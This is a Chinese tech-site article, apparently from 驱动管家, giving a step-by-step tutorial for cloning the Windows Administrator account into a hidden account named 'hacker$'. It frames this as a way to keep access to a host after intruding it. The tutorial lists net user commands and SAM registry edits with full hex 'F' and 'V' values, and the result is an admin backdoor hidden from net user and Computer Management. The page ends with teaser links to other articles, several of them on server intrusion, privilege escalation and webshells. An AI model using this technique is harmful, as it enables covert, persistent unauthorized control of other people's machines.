你知道如何克隆管理员账号吗?克隆账号怎么做?
现在入侵一台主机容易但是保护好很难 所一我们讲一下手动克隆管理员帐号!~
c:\>net user hacker$Content$nbsp;123456 /add
//后面加$Content$nbsp;是为了使在 控制台下用 net user 看不到. 然后运行regedt32.exe(注意不是regedit.exe)
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组, 把"权限"->"完全控制"->"允许"打上勾,然后确定.
这样就可以直接读取本地sam的信息 现在运行regedit.exe
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$
查看默认键值为"0x3f1" 相应导出如下
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$Content$nbsp;为hacker$.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下 "F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00 把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴.
打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$]
@=hex(3f1): 回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\
00,00,00,00,00,00,00
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
37,f1,02,cf,01,00,01,00,01,00,01,00 [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$]
@=hex(3f1): 保存后,将hacker$用户删除
c:\>net user hacker$Content$nbsp;/delete
运行regedit.exe 将我们已经修改好的3f1.reg文件导入.
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才添加的帐号 然后 注销当前用户 用 hacker$/123456 登陆 就会是 最高权限了.03克隆的方法和 2000的克隆 略有点区别
这样就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户hacker$, 记着第一次就把密码设置好,不要改密码。
端口扫描工具:nmap是怎么用的?
其实还是建议看英文的man,对以后学习其他东西很有帮助的:) ——作者:包子Nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息
详情2018-01-23 09:55:01责编:llp 来源:驱动管家jsp服务器空间存在哪些问题?入侵jsp服务器的方法是什么?
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我对他们
详情2018-01-29 19:05:53责编:llp 来源:驱动管家phpmyadmin没有正确地过滤table参数怎么修复?
影响版本:phpMyAdmin phpmyadmin 3 xphpMyAdmin phpMyAdmin 2 11 x漏洞描述:BUGTRAQ ID: 32720phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。phpMyAdmin的 phpmyadmin libraries db_table_exists l
详情2018-02-01 11:01:44责编:llp 来源:驱动管家shell脚本怎么监控mysol服务器?shell脚本监控mysol服务器的步骤
监控MySQL服务是否正常,通常的思路为:检查3306端口是否启动,ps查看mysqld进程是否启动,命令行登录mysql执行语句返回结果,php或jsp程序检测(需要开发人员开发程序)等等;方法1:监听3306端口方法2:查看mys
详情2018-01-05 11:04:57责编:llp 来源:驱动管家迅雷浏览器如何提权?可以利用安装迅雷的htm文件
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,把我们所下载东西添加到列表当中。所对应的htm文件有2处一处是C: Program Files Thunder Network Thunder Progra
详情2018-02-16 18:04:33责编:llp 来源:驱动管家gnome是什么?gnome evolution存在什么漏洞?
gnome是一种用户界面(GUI,或者叫XWindows)。Linux不像Windows,用户可以选择使用不同的用户界面(或者不使用,只使用命令行),让用户更容易的使用系统和管理文件,GNOME是比较流行的一种,而且不止可以用在Li
详情2018-01-24 17:20:08责编:llp 来源:驱动管家dr.web大蜘蛛的病毒隔离路径设置有哪些?
在使用Dr Web的朋友都知道 快速安装方式的病毒隔离路径为C: Program Files DrWeb infected !!!的文件夹下(如下图),其中有监控的隔离区设置,扫描的隔离区设置,发垃圾邮件的隔离区设置三种。下面我们分别来设
详情2018-01-12 16:14:34责编:llp 来源:驱动管家哪些微软技术能实现远程访问?微软怎么保证远程访问的安全?
远程访问一直是个热门话题,人们需要能够随时随地通过任何设备登录网络获取信息。过去利用特定设备或者特定位置访问网络的时代已经过去了,特别是在企业内,人们希望在任何时候都能获取企业信息,可能使用笔记本
详情2018-01-27 18:34:11责编:llp 来源:驱动管家asp.net基础教程 使用asp.net加密口令保护用户数据安全
当我们在网站上建立数据库时,保护用户的信息安全是非常必要的。多数用户不愿意让别人知道自己的信息,同时网管也不想因为安全问题而丢失网站的信誉。无论对于谁,安全问题都是非常重要的。为了解决这个问题,我
详情2018-01-22 13:53:07责编:llp 来源:驱动管家防止入侵和攻击有哪些技术?访问控制技术有哪些内容?
网络管理人员应认真分析各种可能的入侵和攻击形式,制定符合实际需要的网络安全策略,防止可能从网络和系统内部或外部发起的攻击行为,重点防止那些来自具有敌意的国家、企事业单位、个人和内部恶意人员的攻击。
详情2018-02-26 19:07:38责编:llp 来源:驱动管家
- Win7没有和xp一样的驱动安装界面如何手动更新单一驱动程序
- windows无法验证此驱动程序软件的发布者该怎么办?
- 玩盛大游戏时盛大登录卫士怎么使用
- 华为手机助手好不好用?华为手机助手有哪些亮点
- 无驱摄像头用不了怎么解决?无驱摄像头故障解决方法
- 戴尔笔记本电池怎么保养?戴尔笔记本电池保养技巧
- 技术大神将加入苹果 主导Siri等产品研发
- 腾讯即将翻拍日本人气动漫《网球王子》真人版
- vivo V9已曝光 并且采用“刘海”设计
- win7无法创建还原点怎么办?学会这两步就可以解决了
- 最详细的关于yy语音使用方法介绍
- 中兴axon天机是双卡手机吗?支持双卡双待吗?
- 联想p780评测 联想p780怎么样?
- 上网总自动弹出网页怎么办?有什么解决方法
- U盘怎么加密?U盘加密方法有哪些
- php注入有哪些基础步骤?这十点要牢记
- 拿到win2003 server的webshell却登不上终端怎么办?
- UG怎么在球体偏上位置绘制曲线?UG绘制曲线教程
- 快用苹果助手怎么将视频导入到手机上呢
- 怎么增加ups电池的寿命?这六种方法可以帮到你